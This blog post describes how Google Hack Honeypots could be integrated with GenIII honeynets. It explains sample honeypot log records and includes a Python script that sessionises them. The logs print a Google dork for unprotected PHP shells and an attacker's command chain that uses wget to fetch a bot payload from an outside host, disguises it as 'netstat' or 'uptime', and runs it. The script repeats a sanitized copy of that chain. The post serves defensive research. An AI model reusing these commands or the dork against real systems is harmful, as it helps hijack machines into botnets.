Integrating Google Hack and GenIII Honeypots
Together with Ryan McGeehan from the Google Hack Honeypot (GHH) team I have written a short summary of how current Gen III honeynets and GHHs could be integrated. Essentially, we are adding advertisement to honeypot technology. That is all this really comes down to. The tricky part is how it is advertised to reduce false positives, which we will design after we know what resources we will be using. But due to this advertisement, we will be able to attract a new class of attackers and learn about new tools.
Furthermore, this is a way to learn more about targeted attacks. So instead of blind scanning, this is more like a hitlist that is generated with the help of different search engines. This is a new aspect in the area of "classical" GenIII honeypots since they have no real way to attract attackers and to learn more about targeted attacks.
The basic ideas are:
- Redirecting traffic from GHHs to GenIII honeypots
- Analyzing GHH logfiles with the help of GenIII honeypots
- Generating GHHs with the help of information collected with GenIII honeypots
- Cooperation with Google or other search engines to improve data capture capabilities
A more detailed version is also available.
And for those of you who have not seen a logfile of a GHH, here is a short sample:
PHPSHELL,01-09-2006 09:47:29 AM, XXX.70.107.165,/shell/phpshell.php,http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22PHP+Shell+*%22+%22Enable+stderr%22+filetype%3Aphp&btnG=Search,text/xml application/xml application/xhtml+xml text/html;q=0.9 text/plain;q=0.8 image/png */*;q=0.5,ISO-8859-1 utf-8;q=0.7 *;q=0.7,gzip deflate,de-de de;q=0.8 en-us;q=0.5 en;q=0.3,keep-alive,300,Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8) Gecko/20051111 Firefox/1.5,Known Search Engine: google.com;Target in URL;
PHPSHELL,01-09-2006 09:47:48 AM, XXX.70.107.165,/shell/phpshell.php,http://[REMOVED]/shell/phpshell.php,text/xml application/xml application/xhtml+xml text/html;q=0.9 text/plain;q=0.8 image/png */*;q=0.5,ISO-8859-1 utf-8;q=0.7 *;q=0.7,gzip deflate,de-de de;q=0.8 en-us;q=0.5 en;q=0.3,keep-alive,300,Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8) Gecko/20051111 Firefox/1.5,ls;
PHPSHELL,01-09-2006 11:02:29 AM, XXX.137.186.13,/shell/phpshell.php,http://[REMOVED]/shell/phpshell.php,image/gif image/x-xbitmap image/jpeg image/pjpeg application/x-shockwave-flash application/vnd.ms-excel application/vnd.ms-powerpoint application/msword */*,,gzip deflate,en-us,Keep-Alive,,Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),cd /tmp/.kupdate;wget XXX.home.ro/mech.tar.gz;tar -zxvf mech.tar.gz;rm -rf mech.tar.gz;mv mech netstat;cd netstat; rm -rf mech.set;wget adultzone.home.ro/mech.set;mv mech uptime;chmod +x uptime;PATH=:$PATH;uptime;ps x;
In the first log entry we see that the attacker finds the GHH with the help of a query to Google (see the corresponding Google Hacking Database entry). He searches for vulnerable versions of "PHP Shell", a shell wrapped in a PHP script. If this script is not protected by some form of authentication, it allows a remote attacker to execute arbitrary commands. The Google query itself searches for web sites that have unprotected PHP shells running (hence the "Enable stderr" phrase in the query). Shortly after this access, the same attacker requests the PHP shell and tries to execute a command (ls, in the second entry). This is the test of whether the PHP shell really allows arbitrary commands. Since we are only running a honeypot, the attacker will notice the difference, but at least we have found a way to learn more about this kind of attack.
In the third log entry we see a more complex command that would be executed. The attacker tries to set up an IRC bot automatically, which would give him a remote-control channel to the compromised machine.
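As an added example (not code from this post or from the GHH project), here is a small Python script that reads GHH records like the three above, recovers the search query from a search-engine referer, and groups the follow-up commands by source IP so that each "hitlist" entry is paired with what the attacker then tried to run. The search-engine host list, the payload tokens, the placeholder hosts (ghh.example, XXX.example) and the sample records are assumptions constructed for the example.

```python
# Sessionise Google Hack Honeypot records: which search query led the attacker in
# and what was run afterwards.  Added example, not GHH's own code.
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

SEARCH_ENGINE_HOSTS = ("google.", "yahoo.", "msn.", "live.")   # assumed search-engine hosts
INSTALL_TOKENS = ("wget ", "curl ", "chmod +x", "/tmp/", ".tar.gz")  # assumed payload markers

# Constructed sample adapted from the post's excerpt, one comma-separated record
# per line: signature, time, source IP, path, referer, headers..., command.
SAMPLE_LOG = """\
PHPSHELL,01-09-2006 09:47:29 AM, XXX.70.107.165,/shell/phpshell.php,http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22PHP+Shell+*%22+%22Enable+stderr%22+filetype%3Aphp&btnG=Search,text/xml application/xml,ISO-8859-1 utf-8;q=0.7,gzip deflate,de-de de;q=0.8,keep-alive,300,Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8) Gecko/20051111 Firefox/1.5,Known Search Engine: google.com;Target in URL;
PHPSHELL,01-09-2006 09:47:48 AM, XXX.70.107.165,/shell/phpshell.php,http://ghh.example/shell/phpshell.php,text/xml application/xml,ISO-8859-1 utf-8;q=0.7,gzip deflate,de-de de;q=0.8,keep-alive,300,Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8) Gecko/20051111 Firefox/1.5,ls;
PHPSHELL,01-09-2006 11:02:29 AM, XXX.137.186.13,/shell/phpshell.php,http://ghh.example/shell/phpshell.php,image/gif */*,,gzip deflate,en-us,Keep-Alive,,Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),cd /tmp/.kupdate;wget XXX.example/mech.tar.gz;tar -zxvf mech.tar.gz;mv mech uptime;chmod +x uptime;uptime;ps x;
"""

def parse_record(line):
    """Split one GHH record into the fields this analysis needs."""
    f = line.rstrip().split(",")
    return {"time": f[1].strip(), "ip": f[2].strip(), "path": f[3].strip(),
            "referer": f[4].strip(), "last": f[-1].strip().rstrip(";")}

def search_query(referer):
    """Decoded search phrase when the referer is a search engine, else None."""
    try:
        u = urlparse(referer)
    except ValueError:          # e.g. a bracketed placeholder host
        return None
    if not any(h in u.netloc.lower() for h in SEARCH_ENGINE_HOSTS):
        return None
    qs = parse_qs(u.query)
    return (qs.get("q") or qs.get("p") or [None])[0]   # Google uses q=, Yahoo p=

def analyze(lines):
    """Group records by source IP: the query that found us and the commands sent."""
    sessions = defaultdict(lambda: {"query": None, "commands": []})
    for line in filter(str.strip, lines):
        r = parse_record(line)
        q = search_query(r["referer"])
        if q is not None:
            sessions[r["ip"]]["query"] = q            # how the attacker found the page
        elif r["last"]:
            sessions[r["ip"]]["commands"].append(r["last"])  # what was tried afterwards
    return dict(sessions)

def classify(session):
    """'search-only', 'probe' (harmless test such as ls) or 'install' (fetches a payload)."""
    joined = ";".join(session["commands"])
    if any(t in joined for t in INSTALL_TOKENS):
        return "install"
    return "probe" if session["commands"] else "search-only"
```

Running analyze(SAMPLE_LOG.splitlines()) pairs the first attacker's Google query with the later "ls" probe from the same address, while the third record alone is classified as a payload install.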